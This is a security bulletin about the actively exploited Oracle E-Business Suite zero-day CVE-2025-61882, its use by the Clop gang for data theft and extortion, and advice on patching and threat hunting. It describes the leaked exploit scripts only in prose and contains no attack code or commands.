Patched Oracle zero-day and Clop data theft

Oracle have released a new critical Advisory for a zero-day vulnerability, now tracked as “CVE-2025-61882” that is being actively exploited in the wild. This vulnerability, which affects the Oracle E-Business Suite has been assigned a CVSS 3.1 Base Score of 9.8 (CRITICAL). This allows an unauthenticated attacker with network access to compromise the system by enabling them to perform RCE (Remote Code Execution) on the affected host. 

 
The vulnerability affects the BI Publisher Integration component of the Oracle Concurrent Processing product, residing within the Oracle E-Business Suite. Supported versions impacted by this flaw are 12.2.3 through 12.2.14. Due to the severity and ease of exploitation (Attack Complexity: Low; Privileges Required: None; User Interaction: None), organisations running these versions face an extreme and imminent risk of compromise. 

Threat intelligence feeds confirs that this zero-day vulnerability was exploited by the Clop ransomware gang in data theft attacks that took place in August 2025. Clop leveraged this flaw, alongside others (some patched by Oracle in July 2025 updates), to steal large volumes of data from multiple victims' Oracle E-Business Suite systems. The threat actors then engaged in an extortion campaign, sending emails demanding a ransom to prevent the leakage of the stolen private files and documents.  

Clop has a documented history of exploiting zero-day vulnerabilities in massive data theft operations, underscoring the seriousness of this campaign. Moreover, the existence of a public Proof-of-Concept (PoC) exploit enhances the urgency of mitigation.  

While the Clop ransomware group was responsible for the attacks back in August 2025, news of the zero-day and the PoC exploit was leaked on Telegram by a separate group known as the "Scattered Lapsus$ Hunters". This group released an archive containing Python scripts (exp.py and server.py) designed to exploit the vulnerability and execute arbitrary commands on targeted servers or open a reverse shell back to the attacker's server. 

Security teams should use the following IOCs, provided by Oracle, to hunt for malicious activity in their environments. 

What you should do 

The following recommendations are designed to help organisations mitigate their exposure to CVE-2025-61882 and respond effectively to potential compromise. 

• Apply Emergency Patches Immediately: We strongly recommends that all customers apply the security updates provided in the Security Alert for CVE-2025-61882 as soon as possible. The active exploitation of this vulnerability in the wild makes immediate patching the single most critical defense. 
   
• Verify Patch Prerequisites before applying the emergency patch, organisations must ensure that the October 2023 Critical Patch Update has been installed. This earlier update is a critical dependency, and failure to install it first may result in an unsuccessful application of the security updates for this vulnerability. 
   
• Initiate Proactive Threat Hunting: Security teams must use the specific Indicators of Compromise (IP addresses, file hashes, and command strings) detailed in the previous sections to actively hunt for signs of compromise within their Oracle E-Business Suite environments. This includes reviewing network logs for connections to or from the malicious IPs and searching file systems for the exploit scripts/commands. 

 
 
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.